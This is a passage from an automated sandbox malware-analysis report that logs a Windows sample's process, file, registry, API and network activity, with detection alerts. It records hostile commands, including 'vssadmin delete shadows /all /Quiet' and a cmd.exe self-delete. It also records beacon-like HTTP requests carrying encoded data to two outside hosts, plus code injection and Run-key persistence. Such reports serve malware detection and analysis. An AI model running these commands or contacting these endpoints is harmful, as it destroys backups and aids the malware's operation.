38491.               md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
38492.           source:
38493.             processinfo:
38494.               pid: 1648
38495.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38496.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38497.         process:
38498.           timestamp: 223854
38499.           mode: opened
38500.           sequenceNumber: 2687
38501.           desiredaccess: 0x02000030
38502.           ntstatus: 0x00000000
38503.           target:
38504.             processinfo:
38505.               pid: 2804
38506.               imagepath: C:\Windows\System32\dllhost.exe
38507.               md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
38508.           source:
38509.             processinfo:
38510.               pid: 1648
38511.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38512.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38513.         process:
38514.           timestamp: 223861
38515.           mode: opened
38516.           sequenceNumber: 2688
38517.           desiredaccess: 0x02000030
38518.           ntstatus: 0x00000000
38519.           target:
38520.             processinfo:
38521.               pid: 2804
38522.               imagepath: C:\Windows\System32\dllhost.exe
38523.               md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
38524.           source:
38525.             processinfo:
38526.               pid: 1648
38527.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38528.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38529.         codeinjection:
38530.           timestamp: 224177
38531.           suppressed: true
38532.           mode: multiple memory write with inline-hook code injection
38533.           sequenceNumber: 2689
38534.           source:
38535.             tainted: false
38536.             processinfo:
38537.               pid: 2824
38538.               imagepath: C:\Windows\System32\conhost.exe
38539.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38540.           target:
38541.             tainted: true
38542.             processinfo:
38543.               pid: 1648
38544.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38545.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38546.         malicious-alert:
38547.           classtype: Code-Injection-Tracking
38548.           weight: 0
38549.           ruleid: 4602 : Code injection detected ; Code injection with suppression
38550.           msg: Code injection with suppression
38551.           display-msg: Code injection detected
38552.         codeinjection:
38553.           timestamp: 224183
38554.           suppressed: true
38555.           mode: multiple memory write with inline-hook code injection
38556.           sequenceNumber: 2690
38557.           source:
38558.             tainted: false
38559.             processinfo:
38560.               pid: 2824
38561.               imagepath: C:\Windows\System32\conhost.exe
38562.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38563.           target:
38564.             tainted: true
38565.             processinfo:
38566.               pid: 1648
38567.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38568.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38569.         apicall:
38570.           timestamp: 225143
38571.           sequenceNumber: 2691
38572.           processinfo:
38573.             pid: 1648
38574.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38575.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38576.           dllname: Shell32.dll
38577.           apiname: ShellExecuteW
38578.           address: 0x0041f5dd
38579.           params:
38580.             param (id:1): 0x0
38581.             param (id:2): NULL
38582.             param (id:3): C:\Windows\system32\cmd.exe
38583.             param (id:4): /c DEL C:\Users\ADMINI~1\AppData\Roaming\juehk-a.exe
38584.             param (id:5): NULL
38585.             param (id:6): 0
38586.         network:
38587.           timestamp: 225219
38588.           mode: http_request
38589.           sequenceNumber: 2692
38590.           processinfo:
38591.             tainted: true
38592.             pid: 1648
38593.             imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
38594.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38595.           protocol_type: tcp
38596.           destination_port: 80
38597.           ipaddress: 199.16.199.5
38598.           http_request: GET /wp-content/uploads/misc.php?572A56481F78D91A71F483FAC3626A6FC5C708BDC824ACC227CE0530C84EF5BCE71B9E1E14170D30ACA2D344FC20505D35A28EF4E28528AFD6B56D335E0FD40842FB4AB9B95EA8FD98C09DDC5E111D272EAAB3AC23FEACF99A9A7FD33C676EDEACADD35883E9789A900F3641C335094F39EF6F25FB508FA23DCDD573C83EBBFEB0BCD94CBA057602A5703ED6206E87E7DB70C8CC03F61F2299260854A45EAAE14E6E70094647476269CF41767F02716BE08852FE10456D118C7FA933778F4D1CD84A5D344B228FE307F77FE3F18F2518B2549F2C4C7E3469E3880EF4F4F82EACB474F0B8AE365D1CA75F6B8EBEF44B1D1DA5AF46C788C01927854B19E8475C72A63DE2B6A80E22A7F37E855314A5E588C6B0517357E9480DC9DB06524075011297CBD8864445FDA7C2F7505C1BB9DA47AE928C9DE93367A2314E786363012367D62ECC46F7FC2ADA9A210D6C88E6EEB87106485BCF233BC6AF49AE07C1A0190DB5423D357D862E7BBFE7F6F8151E6580 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: aprenderabailarsevillanas.com~~Connection: Keep-Alive~~~~
38599.         network:
38600.           timestamp: 225231
38601.           mode: http_request
38602.           sequenceNumber: 2693
38603.           processinfo:
38604.             tainted: true
38605.             pid: 1648
38606.             imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
38607.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38608.           protocol_type: tcp
38609.           destination_port: 80
38610.           ipaddress: 199.16.199.7
38611.           http_request: GET /sysmisc.php?572A56481F78D91A71F483FAC3626A6FC5C708BDC824ACC227CE0530C84EF5BCE71B9E1E14170D30ACA2D344FC20505D35A28EF4E28528AFD6B56D335E0FD40842FB4AB9B95EA8FD98C09DDC5E111D272EAAB3AC23FEACF99A9A7FD33C676EDEACADD35883E9789A900F3641C335094F39EF6F25FB508FA23DCDD573C83EBBFEB0BCD94CBA057602A5703ED6206E87E7DB70C8CC03F61F2299260854A45EAAE14E6E70094647476269CF41767F02716BE08852FE10456D118C7FA933778F4D1CD84A5D344B228FE307F77FE3F18F2518B2549F2C4C7E3469E3880EF4F4F82EACB474F0B8AE365D1CA75F6B8EBEF44B1D1DA5AF46C788C01927854B19E8475C72A63DE2B6A80E22A7F37E855314A5E588C6B0517357E9480DC9DB065240750112431793F594CAA0CC5A672A93EDB92617B4D267F2343E1AB4D349856F8F20868BA3DE5172593378D266301A16212F66328D335ADC1EA15B0091B1716DA373C1F9 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: woodenden.com~~Connection: Keep-Alive~~~~
38612.         apicall:
38613.           timestamp: 225246
38614.           sequenceNumber: 2694
38615.           processinfo:
38616.             pid: 1648
38617.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38618.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38619.           dllname: kernel32.dll
38620.           apiname: GetSystemDirectoryW
38621.           address: 0x75f92cf2
38622.           params:
38623.             param (id:1): 0x420fa60
38624.             param (id:2): 260
38625.         process:
38626.           timestamp: 225484
38627.           mode: started
38628.           sequenceNumber: 2695
38629.           value: C:\Windows\System32\vssadmin.exe
38630.           pid: 2792
38631.           ppid: 1648
38632.           parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38633.           cmdline: "C:\Windows\System32\vssadmin.exe" delete shadows /all   /Quiet
38634.           filesize: 167424
38635.           md5sum: e23dd973e1444684eb36365deff1fc74
38636.           sha1sum: 09fafeb1b8404124b33c44440be7e3fdb6105f8a
38637.             ads:
38638.           fid (ads:): 281474976737319
38639.         process:
38640.           timestamp: 225491
38641.           mode: opened
38642.           sequenceNumber: 2696
38643.           desiredaccess: 0x02000030
38644.           ntstatus: 0x00000000
38645.           target:
38646.             processinfo:
38647.               pid: 2792
38648.               imagepath: C:\Windows\System32\vssadmin.exe
38649.               md5sum: e23dd973e1444684eb36365deff1fc74
38650.           source:
38651.             processinfo:
38652.               pid: 1648
38653.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38654.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38655.         process:
38656.           timestamp: 225497
38657.           mode: opened
38658.           sequenceNumber: 2697
38659.           desiredaccess: 0x02000030
38660.           ntstatus: 0x00000000
38661.           target:
38662.             processinfo:
38663.               pid: 2792
38664.               imagepath: C:\Windows\System32\vssadmin.exe
38665.               md5sum: e23dd973e1444684eb36365deff1fc74
38666.           source:
38667.             processinfo:
38668.               pid: 1648
38669.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38670.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38671.         process:
38672.           timestamp: 225511
38673.           mode: opened
38674.           sequenceNumber: 2698
38675.           desiredaccess: 0x02000030
38676.           ntstatus: 0x00000000
38677.           target:
38678.             processinfo:
38679.               pid: 1012
38680.               tid: 0
38681.               imagepath: N\AB
38682.           source:
38683.             processinfo:
38684.               pid: 1648
38685.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38686.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38687.         process:
38688.           timestamp: 225516
38689.           mode: started
38690.           sequenceNumber: 2699
38691.           value: C:\Windows\SysWOW64\cmd.exe
38692.           pid: 1012
38693.           ppid: 1648
38694.           parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38695.           cmdline: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\ADMINI~1\AppData\Roaming\juehk-a.exe
38696.           filesize: 302592
38697.           md5sum: ad7b9c14083b52bc532fba5948342b98
38698.           sha1sum: ee8cbf12d87c4d388f09b4f69bed2e91682920b5
38699.             ads:
38700.           fid (ads:): 281474976780679
38701.         process:
38702.           timestamp: 225531
38703.           mode: opened
38704.           sequenceNumber: 2700
38705.           desiredaccess: 0x02000030
38706.           ntstatus: 0x00000000
38707.           target:
38708.             processinfo:
38709.               pid: 2792
38710.               imagepath: C:\Windows\System32\vssadmin.exe
38711.               md5sum: e23dd973e1444684eb36365deff1fc74
38712.           source:
38713.             processinfo:
38714.               pid: 1648
38715.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38716.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38717.         process:
38718.           timestamp: 225536
38719.           mode: opened
38720.           sequenceNumber: 2701
38721.           desiredaccess: 0x02000030
38722.           ntstatus: 0x00000000
38723.           target:
38724.             processinfo:
38725.               pid: 1012
38726.               imagepath: C:\Windows\SysWOW64\cmd.exe
38727.               md5sum: ad7b9c14083b52bc532fba5948342b98
38728.           source:
38729.             processinfo:
38730.               pid: 1648
38731.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38732.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38733.         process:
38734.           timestamp: 225541
38735.           mode: opened
38736.           sequenceNumber: 2702
38737.           desiredaccess: 0x02000030
38738.           ntstatus: 0x00000000
38739.           target:
38740.             processinfo:
38741.               pid: 2792
38742.               imagepath: C:\Windows\System32\vssadmin.exe
38743.               md5sum: e23dd973e1444684eb36365deff1fc74
38744.           source:
38745.             processinfo:
38746.               pid: 1648
38747.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38748.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38749.         process:
38750.           timestamp: 225546
38751.           mode: opened
38752.           sequenceNumber: 2703
38753.           desiredaccess: 0x02000030
38754.           ntstatus: 0x00000000
38755.           target:
38756.             processinfo:
38757.               pid: 1012
38758.               imagepath: C:\Windows\SysWOW64\cmd.exe
38759.               md5sum: ad7b9c14083b52bc532fba5948342b98
38760.           source:
38761.             processinfo:
38762.               pid: 1648
38763.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38764.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38765.         process:
38766.           timestamp: 225551
38767.           mode: opened
38768.           sequenceNumber: 2704
38769.           desiredaccess: 0x02000030
38770.           ntstatus: 0x00000000
38771.           target:
38772.             processinfo:
38773.               pid: 1012
38774.               imagepath: C:\Windows\SysWOW64\cmd.exe
38775.               md5sum: ad7b9c14083b52bc532fba5948342b98
38776.           source:
38777.             processinfo:
38778.               pid: 1648
38779.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38780.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38781.         process:
38782.           timestamp: 225519
38783.           mode: terminated
38784.           sequenceNumber: 2705
38785.           value: C:\Windows\SysWOW64\cmd.exe
38786.           pid: 1012
38787.           ppid: 1648
38788.           parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38789.           cmdline: N/A
38790.             ads:
38791.           fid (ads:): 281474976780679
38792.         process:
38793.           timestamp: 226076
38794.           mode: terminated
38795.           sequenceNumber: 2706
38796.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38797.           pid: 1648
38798.           ppid: 2824
38799.           parentname: C:\Windows\System32\conhost.exe
38800.           cmdline: N/A
38801.             ads:
38802.           fid (ads:): 3096224743903578
38803.         end-of-report:
38804.           sequenceNumber: 2707
38805.         malicious-alert:
38806.           classtype: Suspicious-Persistance-Activity
38807.           weight: 0
38808.           ruleid: 2221 : New file in AppData added to Run regkey ; Process drops a file in AppData then adds to Run regkey
38809.           msg: Process drops a file in AppData then adds to Run regkey
38810.           display-msg: New file in AppData added to Run regkey
38811.         malicious-alert:
38812.           classtype: misc-anom
38813.           weight: 100
38814.           ruleid: 10055 : Suspicious Persistence Activity ; Suspicious Persistence Activity
38815.           msg: Suspicious Persistence Activity
38816.           display-msg: Suspicious Persistence Activity
38817.         malicious-alert:
38818.           classtype: misc-anom
38819.           weight: 100
38820.           ruleid: 10120 : Suspicious Code Injection Activity ; Suspicious Code Injection Activity
38821.           msg: Suspicious Code Injection Activity
38822.           display-msg: Suspicious Code Injection Activity
38823.         malicious-alert:
38824.           classtype: misc-anom
38825.           weight: 100
38826.           ruleid: 10005 : Code Injection Activity ; Code Injection Activity
38827.           msg: Code Injection Activity
38828.           display-msg: Code Injection Activity
38829.         malicious-alert:
38830.           classtype: Generic-Anomalous-Activity
38831.           weight: 0
38832.           ruleid: 8018 : Process Opening explorer ; Process Opening Explorer
38833.           msg: Process Opening Explorer
38834.           display-msg: Process Opening explorer
38835.         malicious-alert:
38836.           classtype: misc-anom
38837.           weight: 100
38838.           ruleid: 10072 : Process Open with Root process deleted ;  Process deleting itself
38839.           msg: Process deleting itself
38840.           display-msg: Process Open with Root process deleted
38841.         malicious-alert:
38842.           classtype: Suspicious-Persistance-Activity
38843.           weight: 0
38844.           ruleid: 4411 : Startup services added for file ; Process adding itself (non-DLL) to windows startup areas for file
38845.           msg: Process adding itself (non-DLL) to windows startup areas for file
38846.           display-msg: Startup services added for file
38847.       os-changes (id:97484):
38848.         osinfo: Microsoft WindowsXP 32-bit 5.1 sp3 15.0826
38849.         version:  1.1290
38850.         analysis:
38851.           sequenceNumber: 1
38852.           product: MPS
38853.           ftype: exe
38854.           mode: malware
38855.           version:  1.1290
38856.         application:
38857.           app-name: Windows Explorer
38858.           sequenceNumber: 2
38859.         os (name:windows):
38860.           version: 5.1.2600
38861.           arch: x86
38862.           sequenceNumber: 3
38863.           sp: 3
38864.         os_monitor:
38865.           date: Aug 13 2015
38866.           version: 15R1
38867.           build: 403692
38868.           sequenceNumber: 4
38869.           time: 17:02:35
38870.         config-update:
38871.           timestamp: 16
38872.           sequenceNumber: 5
38873.           status: success
38874.           update-requested: false
38875.           version: 1.01
38876.         uac:
38877.           timestamp: 7002
38878.           mode: service
38879.           sequenceNumber: 6
38880.           value: Telephony
38881.           status: running
38882.         uac:
38883.           timestamp: 12017
38884.           mode: service
38885.           sequenceNumber: 7
38886.           value: Remote Access Connection Manager
38887.           status: running
38888.         process:
38889.           timestamp: 44051
38890.           mode: started
38891.           sequenceNumber: 8
38892.           value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38893.           pid: 1824
38894.           ppid: 2684
38895.           parentname: C:\WINDOWS\explorer.exe
38896.           cmdline: "C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe"
38897.           filesize: 364544
38898.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38899.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
38900.             ads:
38901.           fid (ads:): 3096224743826754
38902.         file:
38903.           timestamp: 44175
38904.           mode: failed
38905.           sequenceNumber: 9
38906.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\LPK.DLL
38907.           processinfo:
38908.             tainted: true
38909.             pid: 1824
38910.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38911.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38912.             ads:
38913.           fid (ads:): 0
38914.           failure: open
38915.           ntstatus: 0xc0000034
38916.           CreateOptions: 0x200000
38917.           PE:
38918.             InspectionType: Ext
38919.         file:
38920.           timestamp: 44184
38921.           mode: failed
38922.           sequenceNumber: 10
38923.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\USP10.dll
38924.           processinfo:
38925.             tainted: true
38926.             pid: 1824
38927.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38928.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38929.             ads:
38930.           fid (ads:): 0
38931.           failure: open
38932.           ntstatus: 0xc0000034
38933.           CreateOptions: 0x200000
38934.           PE:
38935.             InspectionType: Ext
38936.         regkey:
38937.           randomized: true
38938.           mode: queryvalue
38939.           sequenceNumber: 11
38940.           timestamp: 44191
38941.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
38942.          processinfo:
38943.            pid: 1824
38944.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38946.        file:
38947.          timestamp: 44304
38948.          mode: failed
38949.          sequenceNumber: 12
38950.          value: C:\WINDOWS\aRu2Yo48qPE
38951.          processinfo:
38952.            pid: 1824
38953.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38955.            ads:
38956.          fid (ads:): 0
38957.          failure: open
38958.          ntstatus: 0xc0000034
38959.          CreateOptions: 0x60
38960.        file:
38961.          timestamp: 44730
38962.          mode: failed
38963.          sequenceNumber: 13
38964.          value: C:\WINDOWS\Fonts\FQ2SznG21IEC5G4
38965.          processinfo:
38966.            pid: 1824
38967.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38968.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38969.            ads:
38970.          fid (ads:): 0
38971.          failure: open
38972.          ntstatus: 0xc0000034
38973.          CreateOptions: 0x200000
38974.        file:
38975.          timestamp: 44736
38976.          mode: failed
38977.          sequenceNumber: 14
38978.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\FQ2SznG21IEC5G4
38979.          processinfo:
38980.            pid: 1824
38981.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38982.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38983.            ads:
38984.          fid (ads:): 0
38985.          failure: open
38986.          ntstatus: 0xc0000034
38987.          CreateOptions: 0x200000
38988.        file:
38989.          timestamp: 44746
38990.          mode: failed
38991.          sequenceNumber: 15
38992.          value: C:\WINDOWS\system32\FQ2SznG21IEC5G4
38993.          processinfo:
38994.            pid: 1824
38995.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
38996.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38997.            ads:
38998.          fid (ads:): 0
38999.          failure: open
39000.          ntstatus: 0xc0000034
39001.          CreateOptions: 0x200000
39002.        file:
39003.          timestamp: 44751
39004.          mode: failed
39005.          sequenceNumber: 16
39006.          value: C:\WINDOWS\system\FQ2SznG21IEC5G4
39007.          processinfo:
39008.            pid: 1824
39009.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39010.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39011.            ads:
39012.          fid (ads:): 0
39013.          failure: open
39014.          ntstatus: 0xc0000034
39015.          CreateOptions: 0x200000
39016.        file:
39017.          timestamp: 44756
39018.          mode: failed
39019.          sequenceNumber: 17
39020.          value: C:\WINDOWS\FQ2SznG21IEC5G4
39021.          processinfo:
39022.            pid: 1824
39023.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39024.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39025.            ads:
39026.          fid (ads:): 0
39027.          failure: open
39028.          ntstatus: 0xc0000034
39029.          CreateOptions: 0x200000
39030.        file:
39031.          timestamp: 44763
39032.          mode: failed
39033.          sequenceNumber: 18
39034.          value: C:\WINDOWS\system32\wbem\FQ2SznG21IEC5G4
39035.          processinfo:
39036.            pid: 1824
39037.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39038.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39039.            ads:
39040.          fid (ads:): 0
39041.          failure: open
39042.          ntstatus: 0xc0000034
39043.          CreateOptions: 0x200000
39044.        file:
39045.          timestamp: 44768
39046.          mode: failed
39047.          sequenceNumber: 19
39048.          value: C:\Program Files\QuickTime\QTSystem\FQ2SznG21IEC5G4
39049.          processinfo:
39050.            pid: 1824
39051.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39052.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39053.            ads:
39054.          fid (ads:): 0
39055.          failure: open
39056.          ntstatus: 0xc0000034
39057.          CreateOptions: 0x200000
39058.        file:
39059.          timestamp: 44773
39060.          mode: failed
39061.          sequenceNumber: 20
39062.          value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\FQ2SznG21IEC5G4
39063.          processinfo:
39064.            pid: 1824
39065.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39066.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39067.            ads:
39068.          fid (ads:): 0
39069.          failure: open
39070.          ntstatus: 0xc0000034
39071.          CreateOptions: 0x200000
39072.        file:
39073.          timestamp: 44781
39074.          mode: failed
39075.          sequenceNumber: 21
39076.          value: C:\Program Files\Debugging Tools for Windows (x86)\FQ2SznG21IEC5G4
39077.          processinfo:
39078.            pid: 1824
39079.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39080.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39081.            ads:
39082.          fid (ads:): 0
39083.          failure: open
39084.          ntstatus: 0xc0000034
39085.          CreateOptions: 0x200000
39086.        file:
39087.          timestamp: 44803
39088.          mode: failed
39089.          sequenceNumber: 22
39090.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\cfgmgr32.dll
39091.          processinfo:
39092.            tainted: true
39093.            pid: 1824
39094.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39095.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39096.            ads:
39097.          fid (ads:): 0
39098.          failure: open
39099.          ntstatus: 0xc0000034
39100.          CreateOptions: 0x200000
39101.          PE:
39102.            InspectionType: Ext
39103.        file:
39104.          timestamp: 45025
39105.          mode: failed
39106.          sequenceNumber: 23
39107.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\setupapi.dll
39108.          processinfo:
39109.            tainted: true
39110.            pid: 1824
39111.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39113.            ads:
39114.          fid (ads:): 0
39115.          failure: open
39116.          ntstatus: 0xc0000034
39117.          CreateOptions: 0x200000
39118.          PE:
39119.            InspectionType: Ext
39120.        apicall:
39121.          timestamp: 45097
39122.          sequenceNumber: 24
39123.          processinfo:
39124.            pid: 1824
39125.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39126.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39127.          dllname: kernel32.dll
39128.          apiname: GetSystemDirectoryW
39129.          address: 0x77927324
39130.          params:
39131.            param (id:1): 0x12f80c
39132.            param (id:2): 260
39133.        apicall:
39134.          timestamp: 45102
39135.          sequenceNumber: 25
39136.          processinfo:
39137.            pid: 1824
39138.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39139.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39140.          dllname: kernel32.dll
39141.          apiname: GetComputerNameExW
39142.          address: 0x77927048
39143.          params:
39144.            param (id:1): 0
39145.            param (id:2): 0x12f840
39146.            param (id:3): 0x12f83c
39147.        apicall:
39148.          timestamp: 45106
39149.          sequenceNumber: 26
39150.          processinfo:
39151.            pid: 1824
39152.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39153.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39154.          dllname: kernel32.dll
39155.          apiname: GetComputerNameExW
39156.          address: 0x779270ab
39157.          params:
39158.            param (id:1): 3
39159.            param (id:2): 0x12f840
39160.            param (id:3): 0x12f83c
39161.        regkey:
39162.          randomized: true
39163.          mode: queryvalue
39164.          sequenceNumber: 27
39165.          timestamp: 45111
39166.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
39167.           processinfo:
39168.             pid: 1824
39169.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39170.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39171.         regkey:
39172.           timestamp: 45273
39173.           mode: added
39174.           sequenceNumber: 28
39175.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum
39176.           processinfo:
39177.             pid: 552
39178.             imagepath: C:\WINDOWS\system32\services.exe
39179.             md5sum: 0e776ed5f7cc9f94299e70461b7b8185
39180.         regkey:
39181.           timestamp: 45273
39182.           mode: setval
39183.           sequenceNumber: 29
39184.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum\"0" = Root\LEGACY_MODEM\0000
39185.          processinfo:
39186.            pid: 552
39187.            imagepath: C:\WINDOWS\system32\services.exe
39188.            md5sum: 0e776ed5f7cc9f94299e70461b7b8185
39189.        regkey:
39190.          timestamp: 45273
39191.          mode: setval
39192.          sequenceNumber: 30
39193.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum\"Count" = 0x00000001
39194.           processinfo:
39195.             pid: 552
39196.             imagepath: C:\WINDOWS\system32\services.exe
39197.             md5sum: 0e776ed5f7cc9f94299e70461b7b8185
39198.         regkey:
39199.           timestamp: 45273
39200.           mode: setval
39201.           sequenceNumber: 31
39202.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum\"NextInstance" = 0x00000001
39203.          processinfo:
39204.            pid: 552
39205.            imagepath: C:\WINDOWS\system32\services.exe
39206.            md5sum: 0e776ed5f7cc9f94299e70461b7b8185
39207.        file:
39208.          timestamp: 45362
39209.          mode: failed
39210.          sequenceNumber: 32
39211.          value: C:\WINDOWS\Fonts\R38QI00A0M0\D77273J5H4B
39212.          processinfo:
39213.            pid: 1824
39214.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39215.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39216.            ads:
39217.          fid (ads:): 0
39218.          failure: open
39219.          ntstatus: 0xc000003a
39220.          CreateOptions: 0x200000
39221.        file:
39222.          timestamp: 45366
39223.          mode: failed
39224.          sequenceNumber: 33
39225.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\R38QI00A0M0\D77273J5H4B
39226.          processinfo:
39227.            pid: 1824
39228.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39229.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39230.            ads:
39231.          fid (ads:): 0
39232.          failure: open
39233.          ntstatus: 0xc000003a
39234.          CreateOptions: 0x200000
39235.        file:
39236.          timestamp: 45370
39237.          mode: failed
39238.          sequenceNumber: 34
39239.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\R38QI00a0m0\D77273j5H4b
39240.          processinfo:
39241.            pid: 1824
39242.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39243.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39244.            ads:
39245.          fid (ads:): 0
39246.          failure: open
39247.          ntstatus: 0xc000003a
39248.          CreateOptions: 0x200000
39249.        file:
39250.          timestamp: 45375
39251.          mode: failed
39252.          sequenceNumber: 35
39253.          value: C:\WINDOWS\system32\R38QI00A0M0\D77273J5H4B
39254.          processinfo:
39255.            pid: 1824
39256.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39257.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39258.            ads:
39259.          fid (ads:): 0
39260.          failure: open
39261.          ntstatus: 0xc000003a
39262.          CreateOptions: 0x200000
39263.        file:
39264.          timestamp: 45379
39265.          mode: failed
39266.          sequenceNumber: 36
39267.          value: C:\WINDOWS\system\R38QI00A0M0\D77273J5H4B
39268.          processinfo:
39269.            pid: 1824
39270.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39271.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39272.            ads:
39273.          fid (ads:): 0
39274.          failure: open
39275.          ntstatus: 0xc000003a
39276.          CreateOptions: 0x200000
39277.        file:
39278.          timestamp: 45383
39279.          mode: failed
39280.          sequenceNumber: 37
39281.          value: C:\WINDOWS\R38QI00A0M0\D77273J5H4B
39282.          processinfo:
39283.            pid: 1824
39284.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
